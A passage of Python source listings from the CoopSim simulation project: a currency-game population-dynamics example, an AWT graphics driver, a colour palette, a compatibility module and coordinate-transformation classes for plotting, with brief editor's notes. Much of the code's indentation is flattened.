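    mean = sum(x[i] * fitness[i] for i in range(len(x)))
    return [x[i] * fitness[i] / mean for i in range(len(x))]

table = [[1. / 3, 1. / 3, 1. / 3],
         [2. / 3, 0., 0.],
         [1. / 2, 0., 1. / 2]]
x = [1. / 3, 1. / 3, 1. / 3]          # start at the barycenter
for generation in range(20):          # mirrors the 20 animated generations
    x = replicator_step(x, table)
```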
#### File: CoopSim/PopulationDynamics/Example5.py
```python
import random
try:
from PyPlotter import awtGfx as GfxDriver
except ImportError:
from PyPlotter import wxGfx as GfxDriver
from PyPlotter import Graph, Gfx
import Dynamics
from Compatibility import array
## Definition of the currency game
def CurrencyGame(distribution, epsilon=0.5, gamma=0.5):
"""Determines the number of players that will use gold or
silver as currency in the next round."""
N = distribution["gold"] + distribution["silver"]
i = random.randint(1, N)
if i <= distribution["gold"]:
s = "gold"
distribution["gold"] -= 1
else:
s = "silver"
distribution["silver"] -= 1
p = distribution["gold"] / float(N)
x = random.random()
if x >= epsilon:
if p > gamma: distribution["gold"] += 1
elif p < gamma: distribution["silver"] += 1
else: distribution[s] += 1
else:
if random.random() >= 0.5: distribution["gold"] += 1
else: distribution["silver"] += 1
return distribution
def RunCurrencyGame():
"""A simulation of the 'currency game'."""
# Open a window for graphics output.
    gfx = GfxDriver.Window(title="Currency Game")
    # Set up the graph for plotting the dynamics.
graph = Graph.Cartesian(gfx, 0., 0., 500., 10.,
"Currency Game", "rounds", "gold currency")
graph.addPen("gold currency", Gfx.RED_PEN)
distribution = {"gold": 5, "silver": 5}
graph.addValue("gold currency", 0, distribution["gold"])
# Play the currency game for 2500 rounds and plot the results.
for g in range(1, 2501):
distribution = CurrencyGame(distribution)
graph.addValue("gold currency", g, distribution["gold"])
if g % 100 == 0: gfx.refresh()
## Wait until the user closes the window.
gfx.waitUntilClosed()
if __name__ == "__main__":
print __doc__
RunCurrencyGame()
```
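Editor's note: the game logic in `CurrencyGame` is independent of the plotting layer, so it can also be run headlessly. A small sketch, not part of the original file:
```python
# Illustrative only -- reuses CurrencyGame() from the listing above.
def run_headless(rounds=2500):
    distribution = {"gold": 5, "silver": 5}
    trajectory = [distribution["gold"]]
    for _ in range(rounds):
        distribution = CurrencyGame(distribution)
        trajectory.append(distribution["gold"])
    return trajectory                 # counts of gold users per round
```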
#### File: CoopSim/PyPlotter/awtGfx.py
```python
import math
import java, pawt
from java import awt, applet
import Gfx
from Compatibility import *
driverName = "awtGfx"
########################################################################
#
# class Driver
#
########################################################################
white = java.awt.Color.WHITE
black = java.awt.Color.BLACK
class Driver(Gfx.Driver):
"""A simple graphics layer on top of teh java awt.
See GfxInterface.py
"""
def __init__(self, awtObject):
"""Initialize canvas on an awt component or image.
"""
Gfx.Driver.__init__(self)
self.stroke_width = 1.0
self.stroke_dash = [1.0]
self.stroke = None
self.paint = None
self.w, self.h = 640, 480
self.fsize = 12
self.awtObject = None
self.graphics = None
self.pattern = awt.image.BufferedImage(16, 16, awt.image.BufferedImage.TYPE_INT_RGB)
self.changeGfx(awtObject)
self.setAntialias(True)
def setAntialias(self, onOff):
if onOff:
rh = awt.RenderingHints(awt.RenderingHints.KEY_ANTIALIASING,
awt.RenderingHints.VALUE_ANTIALIAS_ON)
rh.put(awt.RenderingHints.KEY_TEXT_ANTIALIASING,
awt.RenderingHints.VALUE_TEXT_ANTIALIAS_ON)
else:
rh = awt.RenderingHints(awt.RenderingHints.KEY_ANTIALIASING,
awt.RenderingHints.VALUE_ANTIALIAS_OFF)
rh.put(awt.RenderingHints.KEY_TEXT_ANTIALIASING,
awt.RenderingHints.VALUE_TEXT_ANTIALIAS_OFF)
self.graphics.setRenderingHints(rh)
def _updateStroke(self):
if len(self.stroke_dash) > 1:
self.stroke = awt.BasicStroke(self.stroke_width,
awt.BasicStroke.CAP_BUTT,
awt.BasicStroke.JOIN_BEVEL,
10.0, self.stroke_dash, 0.0)
else:
self.stroke = awt.BasicStroke(self.stroke_width,
awt.BasicStroke.CAP_BUTT,
awt.BasicStroke.JOIN_BEVEL,
10.0)
self.graphics.setStroke(self.stroke)
def _updatePaint(self):
awtColor = awt.Color(self.color[0], self.color[1], self.color[2])
if self.fillPattern == Gfx.SOLID:
self.graphics.setColor(awtColor)
self.graphics.setPaint(awtColor)
self.paint = awtColor
return
gr = self.pattern.createGraphics()
gr.setColor(awt.Color(255,255,255)) # quick hack: should be transparent
gr.fillRect(0,0,16,16)
gr.setColor(awtColor)
if self.fillPattern == Gfx.PATTERN_A:
for x in range(0,16,4):
gr.drawLine(x, 0, x+16, 16)
gr.drawLine(x+1, 0, x+17, 16)
gr.drawLine(x-16, 0, x, 16)
gr.drawLine(x-15, 0, x+1, 16)
elif self.fillPattern == Gfx.PATTERN_B:
for x in range(0,16,4):
gr.drawLine(x, 0, x-16, 16)
gr.drawLine(x+1, 0, x-15, 16)
gr.drawLine(x+16, 0, x, 16)
gr.drawLine(x+17, 0, x+1, 16)
elif self.fillPattern == Gfx.PATTERN_C:
for x in range(0,16,4):
for y in range(0,16,4):
gr.fillRect(x, y, 2, 2)
else: raise ValueError("'pattern' must be 'solid' or 'patternA', " + \
"'patternB', 'patternC' !")
self.paint = awt.TexturePaint(self.pattern, awt.Rectangle(16,16))
def changeGfx(self, awtObject):
"""Change the awt object (either image or awt component)"""
self.awtObject = awtObject
self.graphics = self.awtObject.getGraphics()
self._updateStroke()
self.resizedGfx()
self.reset()
def resizedGfx(self):
self.w = self.awtObject.getWidth()
self.h = self.awtObject.getHeight()
def getSize(self):
return self.w, self.h
def getResolution(self):
return 100
def setColor(self, rgbTuple):
self.color = rgbTuple
#self.graphics.setColor(awt.Color(*rgbTuple))
awtColor = awt.Color(rgbTuple[0], rgbTuple[1], rgbTuple[2])
self.graphics.setPaint(awtColor)
self.graphics.setColor(awtColor)
self._updatePaint()
def setLineWidth(self, width):
self.lineWidth = width
if width == Gfx.THIN: self.stroke_width = 1.0
elif width == Gfx.MEDIUM: self.stroke_width = 2.0
elif width == Gfx.THICK: self.stroke_width = 3.0
else: raise ValueError("'thickness' must be 'thin', 'medium' or 'thick' !")
self._updateStroke()
def setLinePattern(self, pattern):
self.linePattern = pattern
if pattern == Gfx.CONTINUOUS:
self.stroke_dash = [1.0]
elif pattern == Gfx.DASHED:
self.stroke_dash = [5.0,5.0]
elif pattern == Gfx.DOTTED:
self.stroke_dash = [2.0, 2.0]
else: raise ValueError("'pattern' must be 'continuous', " + \
"'dashed' or 'dotted' !")
self._updateStroke()
def setFillPattern(self, pattern):
self.fillPattern = pattern
self._updatePaint()
def setFont(self, ftype, size, weight):
self.fontType = ftype
self.fontSize = size
self.fontWeight = weight
if ftype == Gfx.SANS: ff = "SansSerif"
elif ftype == Gfx.SERIF: ff = "Serif"
elif ftype == Gfx.FIXED: ff = "Monospaced"
else:
raise ValueError("'type' must be 'sans', 'serif' or 'fixed' !")
if size == Gfx.SMALL: fsize = 10
elif size == Gfx.NORMAL: fsize = 14
elif size == Gfx.LARGE: fsize = 18
else:
raise ValueError("'size' must be 'small', 'normal' or 'large' !")
self.fsize = fsize
fst = 0
if "i" in weight: fst |= awt.Font.ITALIC
elif "b" in weight: fst |= awt.Font.BOLD
self.graphics.setFont(awt.Font(ff, fst, fsize))
def getTextSize(self, text):
return (len(text) * self.fsize*2/3, self.fsize)
# very inexact!
def drawLine(self, x1, y1, x2, y2):
self.graphics.drawLine(x1, self.h-y1-1, x2, self.h-y2-1)
def drawPoly(self, array):
xpoints = [x for x,y in array]
ypoints = [self.h-y-1 for x,y in array]
self.graphics.drawPolyline(xpoints, ypoints, len(array))
def drawRect(self, x, y, w, h):
self.graphics.drawRect(x,self.h-y-h,w-1,h-1)
def fillRect(self, x, y, w, h):
self.graphics.setPaint(self.paint)
self.graphics.fillRect(x,self.h-y-h,w,h)
self.graphics.setPaint(awt.Color(self.color[0], self.color[1], self.color[2]))
def fillPoly(self, array):
if len(array) == 0: return
xpoints = [x for x,y in array]
ypoints = [self.h-y-1 for x,y in array]
self.graphics.setPaint(self.paint)
self.graphics.fillPolygon(xpoints, ypoints, len(array))
        # restore the plain colour after pattern fills, as fillRect does
        self.graphics.setPaint(awt.Color(self.color[0], self.color[1], self.color[2]))
# polygon = awt.Polygon(xpoints, ypoints, len(array))
#polygon = awt.Polygon()
#for i in range(len(array)-1):
# x,y = array[i]
# print x, y
# polygon.addPoint(x, self.h-y-1)
#self.graphics.fillPolygon(polygon)
def writeStr(self, x, y, str, rotationAngle=0.0):
w,h = self.getTextSize(str)
if rotationAngle == 0.0:
self.graphics.drawString(str, x, self.h-y)
else:
af = awt.geom.AffineTransform()
theta = (360.0-rotationAngle)*math.pi/180.0
af.rotate(theta, x, self.h-y)
saveAT = self.graphics.getTransform()
self.graphics.setTransform(af)
self.graphics.drawString(str, x, self.h-y)
self.graphics.setTransform(saveAT)
# dcfg = self.graphics.getDeviceConfiguration()
# image = dcfg.createCompatibleImage(w, h)
# g = image.getGraphics()
# g.setFont(awt.Font(self.ff, self.fst, self.fsize))
# g.drawString(str, 0, h*5/6)
# a = rotationAngle / 180.0 * math.pi
# da = math.atan2(h,0)-a
# dw = int(h*math.cos(da)+0.5)
# dh = int(h*math.sin(da)+0.5)-h
# for dy in range(h):
# for dx in range(w):
# if (image.getRGB(dx, dy) & 0x00FFFFFF) != 0:
# r = math.sqrt(dx**2+dy**2)
# da = math.atan2(dy,dx) - a
# xx = int(r * math.cos(da)+0.5)
# yy = int(r * math.sin(da)+0.5)
# self.graphics.drawLine(x+xx-dw, self.h-y-h-1+yy-dh,
# x+xx-dw, self.h-y-h-1+yy-dh)
########################################################################
#
# class Window
#
########################################################################
myCanvas = None
myApplet = None
class Canvas(awt.Canvas):
def __init__(self):
self.win = None
def setWin(self, win):
self.win = win
def paint(self, g):
if self.win != None: self.win.refresh()
class Applet(applet.Applet):
def init(self):
self.setLayout(awt.BorderLayout())
self.panel = awt.Panel()
self.panel.setLayout(awt.BorderLayout())
self.canvas = Canvas()
self.panel.add(self.canvas)
self.add(self.panel)
class Window(Driver, Gfx.Window):
def __init__(self, size=(640,480), title="awtGraph"):
global myCanvas, myApplet
if myCanvas == None:
if myApplet == None:
myApplet = Applet()
pawt.test(myApplet, name=title, size=(size[0]+8,size[1]+30))
myCanvas = myApplet.canvas
dcfg = myCanvas.getGraphics().getDeviceConfiguration()
self.image = dcfg.createCompatibleImage(size[0], size[1])
Driver.__init__(self, self.image)
if isinstance(myCanvas, Canvas): myCanvas.setWin(self)
def refresh(self):
myCanvas.getGraphics().drawImage(self.image, None, 0, 0)
def quit(self):
pass
def waitUntilClosed(self):
self.refresh()
########################################################################
#
# Test
#
########################################################################
if __name__ == "__main__":
import systemTest
systemTest.Test_awtGfx()
```
#### File: CoopSim/PyPlotter/Colors.py
```python
try:
from Compatibility import *
except ImportError:
from . import Compatibility
globals().update(Compatibility.__dict__)
########################################################################
#
# colors
#
########################################################################
##~ BLACK = (0.0, 0.0, 0.0)
##~ WHITE = (1.0, 1.0, 1.0)
##~ RED = (1.0, 0.0, 0.0)
##~ GREEN = (0.0, 1.0, 0.0)
##~ BLUE = (0.0, 0.0, 1.0)
##~ YELLOW = (1.0, 1.0, 0.0)
##~ TURKEY = (0.0, 1.0, 1.0)
##~ PINK = (1.0, 0.0, 1.0)
colors=(
(0.00,0.00,0.50), (1.00,1.00,0.00), (0.33,1.00,1.00), (1.00,0.00,1.00),
(0.00,1.00,0.00), (1.00,0.00,0.00), (1.00,0.67,0.67), (0.40,0.40,0.00),
(0.33,0.33,1.00), (0.00,0.60,0.60), (0.40,1.00,0.40), (0.60,0.00,0.40),
(0.50,0.50,0.50), (1.00,0.50,0.00), (0.00,0.00,1.00), (0.67,0.67,1.00),
(0.00,0.20,0.00), (1.00,0.20,0.40), (0.60,0.80,0.00), (0.50,0.00,0.00),
(0.00,1.00,0.50), (0.80,1.00,0.80), (0.00,0.67,1.00), (0.00,0.60,0.20),
(0.60,0.00,0.80), (0.80,1.00,0.40), (1.00,0.40,1.00), (0.20,0.00,0.20),
(1.00,0.80,1.00), (0.00,1.00,1.00), (0.00,0.33,1.00), (0.33,0.00,1.00),
(0.33,0.67,1.00), (0.33,1.00,0.00), (0.67,0.33,1.00), (1.00,0.67,0.33),
(1.00,0.00,0.67), (0.60,0.80,0.60), (0.80,0.40,0.60), (0.40,0.20,0.60),
(0.20,0.40,0.40), (0.80,0.40,0.20), (0.33,0.67,0.33), (0.33,0.67,0.67),
(0.67,0.67,0.33), (0.20,0.60,0.00), (0.40,0.20,0.20), (0.60,1.00,0.20),
(0.80,0.00,0.20), (0.80,0.20,0.00), (1.00,1.00,0.60), (0.00,0.33,0.67),
(0.80,0.20,0.80), (0.33,1.00,0.67), (0.20,0.20,0.80), (0.60,1.00,1.00),
(0.80,0.60,0.80), (0.00,0.80,0.80), (0.20,1.00,0.20), (0.50,0.50,1.00),
(1.00,0.50,0.50), (0.80,0.80,0.20), (0.00,0.50,0.00), (0.20,0.00,0.60),
(0.00,0.20,0.40), (0.80,0.60,0.00), (0.00,0.80,0.40), (0.40,0.40,0.80),
(1.00,0.33,0.67), (1.00,0.00,0.33), (1.00,1.00,0.33), (0.67,0.00,1.00),
(0.67,1.00,0.00), (0.80,0.00,0.60), (0.40,0.80,0.80), (0.00,0.40,0.20),
(0.20,0.40,0.60), (0.40,0.00,0.40), (0.40,0.00,0.80), (0.40,0.80,0.00),
(0.60,0.20,0.20), (0.60,0.20,0.60), (0.60,0.40,0.00), (0.60,0.40,0.80),
(0.00,0.00,0.20), (0.00,0.20,0.20), (0.00,0.40,0.40), (0.00,1.00,0.20),
(0.20,0.00,0.00), (0.20,0.00,0.40), (0.20,0.20,0.00), (0.20,0.20,0.20),
(0.20,0.20,0.40), (0.20,0.40,0.00), (0.20,0.40,0.20), (0.20,0.80,0.40),
(0.20,0.80,0.80), (0.40,0.00,0.20), (0.40,0.20,0.00), (0.40,0.20,0.40),
(0.40,0.40,0.20), (0.40,0.80,0.20), (0.60,0.20,0.40), (0.80,0.40,0.40),
(1.00,0.20,0.20), (1.00,0.20,1.00), (0.00,0.00,0.80), (0.00,0.60,0.40),
(0.00,0.60,0.80), (0.00,0.80,0.00), (0.00,0.80,0.20), (0.00,0.80,0.60),
(0.00,1.00,0.80), (0.20,0.00,0.80), (0.20,0.20,0.60), (0.20,0.40,0.80),
(0.20,0.60,0.80), (0.20,0.80,0.00), (0.20,0.80,0.20), (0.20,0.80,0.60),
(0.20,1.00,0.40), (0.40,0.00,0.60), (0.40,0.20,0.80), (0.40,0.60,0.00),
(0.40,1.00,0.20), (0.60,0.00,0.20), (0.60,0.00,0.60), (0.60,0.20,0.00),
(0.60,0.20,0.80), (0.60,0.40,0.20), (0.60,0.60,0.00), (0.60,0.60,0.80),
(0.60,0.80,0.20), (0.60,0.80,0.80), (0.60,1.00,0.40), (0.60,1.00,0.60),
(0.60,1.00,0.80), (0.80,0.00,0.00), (0.80,0.00,0.40), (0.80,0.00,0.80),
(0.80,0.20,0.20), (0.80,0.20,0.40), (0.80,0.20,0.60), (0.80,0.40,0.00),
(0.80,0.40,0.80), (0.80,0.60,0.20), (0.80,0.60,0.60), (0.80,0.80,0.00),
(0.80,0.80,0.40), (0.80,0.80,0.60), (0.80,0.80,0.80), (0.80,1.00,0.20),
(0.80,1.00,0.60), (0.80,1.00,1.00), (1.00,0.20,0.00), (1.00,0.40,0.20),
(1.00,0.60,1.00), (1.00,0.80,0.00), (0.20,0.60,0.20), (0.80,0.80,1.00),
(1.00,0.80,0.80), (0.00,0.20,0.80), (0.20,0.80,1.00), (0.20,1.00,0.80),
(0.80,0.20,1.00), (1.00,0.20,0.80), (1.00,0.80,0.20), (0.20,0.20,1.00),
(0.60,0.60,0.60), (0.60,0.40,0.60), (0.40,0.40,0.60), (0.60,0.40,0.40),
(0.40,0.40,0.40), (0.00,0.50,1.00), (0.50,0.00,1.00), (0.50,1.00,0.00),
(1.00,0.00,0.50), (0.40,0.80,0.40), (0.40,0.60,0.80), (0.40,0.80,0.60),
(0.60,0.80,0.40), (0.80,0.60,0.40), (0.20,0.60,0.40), (0.40,0.60,0.20),
(0.20,0.60,0.60), (0.60,0.60,0.20), (0.00,0.40,0.80), (0.40,0.80,1.00),
(0.40,1.00,0.80), (0.80,0.40,1.00), (1.00,0.40,0.80), (1.00,0.80,0.40),
(0.60,0.80,1.00), (0.80,0.60,1.00), (1.00,0.60,0.80), (1.00,0.80,0.60),
(1.00,0.33,0.33), (0.20,0.40,1.00), (0.40,0.20,1.00), (0.00,0.20,0.60),
(0.20,0.60,1.00), (0.20,1.00,0.60), (0.60,0.20,1.00), (1.00,0.20,0.60),
(1.00,0.60,0.20), (0.00,0.50,0.50), (0.50,0.00,0.50), (0.50,0.50,0.00),
(0.50,1.00,0.50), (0.00,0.00,0.67), (0.00,0.67,0.00), (0.00,1.00,0.67),
(0.67,0.00,0.00), (1.00,0.67,0.00), (0.00,0.80,1.00), (0.80,0.00,1.00),
(0.80,1.00,0.00), (1.00,0.00,0.80), (0.00,0.00,0.33), (0.00,0.33,0.00),
(0.00,1.00,0.33), (0.33,0.00,0.00), (1.00,0.33,0.00), (0.00,0.20,1.00),
(0.20,0.00,1.00), (0.20,1.00,0.00), (0.20,1.00,1.00), (1.00,0.00,0.20),
(1.00,1.00,0.20), (0.33,0.33,0.33), (0.33,0.33,0.67), (0.67,0.33,0.33),
(0.40,0.60,0.40), (0.67,0.33,0.67), (0.40,0.60,0.60), (0.60,0.60,0.40),
(0.67,0.67,0.67), (0.50,1.00,1.00), (1.00,1.00,0.50), (1.00,0.50,1.00),
(0.00,0.33,0.33), (0.33,0.00,0.33), (0.33,0.33,0.00), (0.33,1.00,0.33),
(0.40,0.40,1.00), (1.00,0.40,0.40), (0.00,0.67,0.33), (0.33,0.00,0.67),
(0.33,0.67,0.00), (0.67,0.00,0.33), (0.67,0.33,0.00), (0.67,1.00,0.33),
(0.00,0.40,0.60), (0.40,0.60,1.00), (0.40,1.00,0.60), (0.60,0.40,1.00),
(1.00,0.40,0.60), (1.00,0.60,0.40), (0.00,0.67,0.67), (0.67,0.00,0.67),
(0.67,0.67,0.00), (0.67,1.00,0.67), (0.60,0.60,1.00), (1.00,0.60,0.60),
(1.00,0.33,1.00), (0.00,0.00,0.40), (0.00,0.40,0.00), (0.00,0.40,1.00),
(0.00,1.00,0.40), (0.40,0.00,0.00), (0.40,0.00,1.00), (0.40,1.00,0.00),
(0.40,1.00,1.00), (1.00,0.00,0.40), (1.00,0.40,0.00), (1.00,1.00,0.40),
(0.67,1.00,1.00), (1.00,0.67,1.00), (1.00,1.00,0.67), (0.00,0.00,0.60),
(0.00,0.60,0.00), (0.00,0.60,1.00), (0.00,1.00,0.60), (0.60,0.00,0.00),
(0.60,0.00,1.00), (0.60,1.00,0.00), (1.00,0.00,0.60), (1.00,0.60,0.00)
)
########################################################################
#
# color filters
#
########################################################################
def RedFilter(c):
"""Returns True if color can be classified as a shade of red"""
if (c[0] > c[1]) and (c[0] > c[2]) and (c[1] == c[2]): return True
else: return False
def GreenFilter(c):
"""Returns True if color can be classified as a shade of green"""
if (c[1] > c[0]) and (c[1] > c[2]) and (c[0] == c[2]): return True
else: return False
def BlueFilter(c):
"""Returns True if color can be classified as a shade of blue"""
if (c[2] > c[1]) and (c[2] > c[0]) and (c[1] == c[0]): return True
else: return False
def YellowFilter(c):
"""Returns True if color can be classified as a shade of yellow"""
if (c[0] > c[2]) and (c[1] > c[2]) and (c[0] == c[1]): return True
else: return False
def PinkFilter(c):
"""Returns True if color can be classified as a shade of pink"""
if (c[0] > c[1]) and (c[2] > c[1]) and (c[2] == c[0]): return True
else: return False
def TurkeyFilter(c):
"""Returns True if color can be classified as a shade of turkey"""
if (c[2] > c[0]) and (c[1] > c[0]) and (c[2] == c[1]): return True
else: return False
```
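Editor's note: the filters classify entries of the `colors` table above by hue; "turkey" appears to be a mistranslation of turquoise (cyan). A short sketch of the intended use:
```python
# Illustrative only: partition the palette into rough hue classes.
reds = [c for c in colors if RedFilter(c)]
# e.g. (1.00, 0.67, 0.67) passes RedFilter: r > g, r > b and g == b.
blues = [c for c in colors if BlueFilter(c)]
```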
#### File: CoopSim/PyPlotter/Compatibility.py
```python
try:
set
except NameError:
try:
import sets
except ImportError:
import altsets as sets
set = sets.Set
# had to be commented out in order to allow Python 3.0 compatibility
# sacrifices some backward compatibility (python 2.1?) though
#try:
# True, False
#except NameError:
# True, False = (0==0, 0!=0)
try:
object
except NameError:
class object:
pass
import sys
if sys.platform[:4] == "java" and sys.version[:3] == "2.2":
class object: # avoid problems with copy.deepcopy
pass
def GetDriver(check=["qtGfx", "gtkGfx", "wxGfx", "tkGfx", "awtGfx"]):
"""Get any available Gfx Driver."""
for wish in check:
if wish == "qtGfx":
try:
import qtGfx
return qtGfx
except ImportError:
try:
from . import qtGfx
return qtGfx
except ImportError:
pass
elif wish == "gtkGfx":
try:
import gtkGfx
return gtkGfx
except ImportError:
try:
from . import gtkGfx
return gtkGfx
except ImportError:
pass
elif wish == "wxGfx":
try:
import wxGfx
return wxGfx
except ImportError:
pass
elif wish == "tkGfx":
try:
import tkGfx
print("WARNING: tk is not fully supported by PyPlotter.\n"+\
"Use of wxPython or PyGTK2 is highly recoomended!\n\n")
return tkGfx
except ImportError:
try:
from . import tkGfx
return tkGfx
except ImportError:
pass
elif wish == "awtGfx":
try:
import awtGfx
return awtGfx
except ImportError:
pass
raise ImportError("Could not find a graphics drivers for PyPlotter!\n\n")
```
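Editor's note: a hedged usage sketch; each driver module is assumed to expose a `Window` class with the same signature that `awtGfx` shows above.
```python
# Illustrative only -- pick whichever backend is installed.
GfxDriver = GetDriver(check=["wxGfx", "tkGfx"])
window = GfxDriver.Window(size=(640, 480), title="Demo")
```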
#### File: CoopSim/PyPlotter/Graph.py
```python
import copy
import math
import random
try:
from Compatibility import *
except ImportError:
from . import Compatibility
globals().update(Compatibility.__dict__)
try:
import Gfx
import Colors
import psGfx
except ImportError:
from . import Gfx, Colors, psGfx
########################################################################
#
# class CoordinateTransformer
#
########################################################################
class CoordinateTransformer(object):
"""Transforms virtual coordinates to screen (or printer) coordinates
Attributes (read only!):
vx1, vy1, vx2, vy1 - virtual coordinate range
sx1, sy1, sx2, sy2 - screen coordinate range
keepAspect - keep aspect ratio (boolean)
"""
def __init__(self, x1, y1, x2, y2, vx1=-1.0, vy1=-1.0,
vx2=1.0, vy2=1.0, keepAspectRatio=True):
"""Initialize coordinate transformer with sreen and virtual
coordinate range.
"""
self.x1 = vx1
self.y1 = vy1
self.x2 = vx2
self.y2 = vy2
self.keepAspect = keepAspectRatio
self.setScreen(x1, y1, x2, y2)
def setScreen(self, x1, y1, x2, y2):
"""Define the screen coordinates. Note that the direction is
always from bottom to top and from left to right. So, if the
origin of the screen is the upper left corner, y1 and y2 have
to be swapped.
"""
self.sx1 = x1
self.sy1 = y1
self.sx2 = x2
self.sy2 = y2
self.sw = x2 - x1
self.sh = y2 - y1
self.setRange(self.x1, self.y1, self.x2, self.y2)
def setRange(self, x1, y1, x2, y2):
"""Set the virtual coordinate range."""
self.x1 = float(x1)
self.y1 = float(y1)
self.x2 = float(x2)
self.y2 = float(y2)
self.w = self.x2 - self.x1
self.h = self.y2 - self.y1
self.xmult = self.sw / self.w
self.ymult = self.sh / self.h
self.dx = 0
self.dy = 0
if self.keepAspect:
sr = float(self.sw) / float(self.sh)
vr = self.w / self.h
if sr < vr:
self.ymult *= sr / vr
self.dy = round((self.sh - self.h * self.ymult) / 2.0)
elif sr > vr:
self.xmult *= vr / sr
self.dx = round((self.sw - self.w * self.xmult) / 2.0)
self.dx += (0.0 - x1) * self.xmult - (0 - self.sx1)
self.dy += (0.0 - y1) * self.ymult - (0 - self.sy1)
def keepAspectRatio(self, yesno):
"""boolean: Keep Aspect Ratio?"""
if yesno != self.keepAspect:
self.keepAspect = yesno
self.setRange(self.x1, self.y1, self.x2, self.y2)
def X(self, x):
"""Transform virtual x-coordinate to screen coortinate."""
return int(x * self.xmult + self.dx + 0.5)
def Y(self, y):
"""Transform virtual y-coordinate to screen coortinate."""
return int(y * self.ymult + self.dy + 0.5)
def transform(self, pointList):
"""Transform an array of (x,y)-tupels to screen coordinates."""
return [(self.X(p[0]), self.Y(p[1])) for p in pointList]
def invX(self, sx):
"""Transform a screen x-coordinate to a virtual coordinate."""
return float(sx - self.dx) / self.xmult
def invY(self, sy):
"""Transform a screen y-coordinate to a virtual coordinate."""
return float(sy - self.dy) / self.ymult
def inverse(self, pointList):
"""Retransform an array of (x,y)-tupels of screen coordinates
to virtual coordinates.
"""
return [(self.invX(p[0]), self.invY(p[1])) for p in pointList]
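# Editorial example (comments only, not original code): with a 100x100 pixel
# region and the default virtual range -1..1 on both axes,
#     tr = CoordinateTransformer(0, 0, 99, 99)
#     tr.X(0.0) == 50 and tr.invX(50) is close to 0.0,
# i.e. X()/Y() quantize to whole pixels while invX()/invY() map back only
# approximately.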
########################################################################
#
# class VirtualScreen
#
########################################################################
def screenRegion(gfx, region=(0.0, 0.0, 1.0, 1.0)):
"""(gfx, 4-tuple of floats) -> (4-tuple of ints)
Determine the absolute coordinates of a screen region from its
relative coordinates (coordinates from 0.0 to 1.0)
"""
w, h = gfx.getSize()
x1 = (w - 1) * region[0]
y1 = (h - 1) * region[1]
x2 = (w - 1) * region[2]
y2 = (h - 1) * region[3]
if type(w) == type(1):
x1 = int(x1 + 0.5)
y1 = int(y1 + 0.5)
x2 = int(x2 + 0.5)
y2 = int(y2 + 0.5)
return (x1, y1, x2, y2)
def relativeRegion(region, parentRegion):
"""(region, region) -> (region)
Create a region as part of another region. => region
"""
w = parentRegion[2] - parentRegion[0]
h = parentRegion[3] - parentRegion[1]
x1 = parentRegion[0] + w * region[0]
y1 = parentRegion[1] + h * region[1]
x2 = parentRegion[0] + w * region[2]
y2 = parentRegion[1] + h * region[3]
return (x1, y1, x2, y2)
REGION_FULLSCREEN = (0.0, 0.0, 1.0, 1.0)
REGION_FRAMED = (0.05, 0.05, 0.95, 0.95)
class VirtualScreen(object):
"""Uses a region of the graphics area as a virtual screen.
Attributes (read only!):
gfx - the graphics interface
region - 4-tuple of floats: the relative coordinates of the
screen region Ex: (0.,0.,1.,1.) == full screen
tr - the coordinate transformer
"""
def __init__(self, gfx, x1, y1, x2, y2, region, keepAspectRatio):
"""Occupies a region on gfx using coordinate range x1,y1 to x2,y2
"""
self.gfx = gfx
self.region = region
scr = self.screenRegion()
self.tr = CoordinateTransformer(scr[0], scr[1], scr[2], scr[3],
x1, y1, x2, y2,
keepAspectRatio)
def screenRegion(self):
"""Retruns the screen coordinates of the virual screen.
Determines the screen coordinates of the region covered by
the virtual screen."""
return screenRegion(self.gfx, self.region)
def adjustRange(self, x1, y1, x2, y2):
"""Adjusts the coordinate range."""
self.tr.setRange(x1, y1, x2, y2)
def adjustRegion(self, region):
"""Adjusts the region of the screen that is used."""
self.region = region
self.resizedGfx()
def resizedGfx(self):
"""Adjusts attributes after a resize of the graphics interface.
"""
scr = self.screenRegion()
self.tr.setScreen(scr[0], scr[1], scr[2], scr[3])
def changeGfx(self, gfx):
"""Use a new graphics interface from now on. Returns the old
graphics interface."""
oldGfx = self.gfx
self.gfx = gfx
self.resizedGfx()
return oldGfx
# ~ def redraw(self):
# ~ """Redraw the contents of the virtual screen.
# ~ The redraw method must always be called explicitly"""
# ~ pass # this is a dummy!
########################################################################
#
# class HardFramedScreen
#
########################################################################
class HardFramedScreen(VirtualScreen):
"""A virtual screen with a hard frame, i.e. a frame of which the
size is defined by screen coordinates (instead of region size or
virtual coordinates).
Attributes:
top, bottom, left, right - frame width on the respective side
sx1, sy1, sx2, sy2 - the screen coordinates of the full
screen (including the frame).
        overlap - 4-tuple of integers, representing the
            z-values of the top, bottom, left and right frame parts.
"""
def __init__(self, gfx, x1, y1, x2, y2, region,
top, bottom, left, right, keepAspect,
overlap=(1, 1, 0, 0)):
"""Initializes a VirtualScreen with a frame defined by 'top',
'bottom', 'left', 'right'
"""
self.top = top
self.bottom = bottom
self.left = left
self.right = right
self.overlap = overlap
VirtualScreen.__init__(self, gfx, x1, y1, x2, y2, region,
keepAspect)
def _setOverlap(self, overlap):
"""Changes the overlapping order of the side frames."""
self.overlap = overlap
def screenRegion(self):
scr = VirtualScreen.screenRegion(self)
self.sx1, self.sy1, self.sx2, self.sy2 = scr
return (scr[0] + self.left, scr[1] + self.bottom,
scr[2] - self.right, scr[3] - self.top)
def adjustFrame(self, top, bottom, left, right):
"""Changes the frame size."""
self.top = top
self.bottom = bottom
self.left = left
self.right = right
self.resizedGfx()
def innerFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the inner
frame."""
return (self.sx1 + self.left, self.sy1 + self.bottom,
self.sx2 - self.right, self.sy2 - self.top)
def topFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the top frame.
"""
if self.overlap[3] > self.overlap[0]:
sx2 = self.sx2 - self.right
else:
sx2 = self.sx2
if self.overlap[2] > self.overlap[0]:
sx1 = self.sx1 + self.left - 1
else:
sx1 = self.sx1
return (sx1, self.sy2 - self.top + 1, sx2, self.sy2)
def bottomFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the bottom
frame."""
if self.overlap[3] > self.overlap[1]:
sx2 = self.sx2 - self.right
else:
sx2 = self.sx2
if self.overlap[2] > self.overlap[1]:
sx1 = self.sx1 + self.left - 1
else:
sx1 = self.sx1
return (sx1, self.sy1, sx2, self.sy1 + self.bottom - 1)
def leftFrame(self):
"""-> (sx1, sy1, sx2, sy2) screen coordinates of the left frame.
"""
if self.overlap[0] > self.overlap[2]:
sy2 = self.sy2 - self.top
else:
sy2 = self.sy2
if self.overlap[1] > self.overlap[2]:
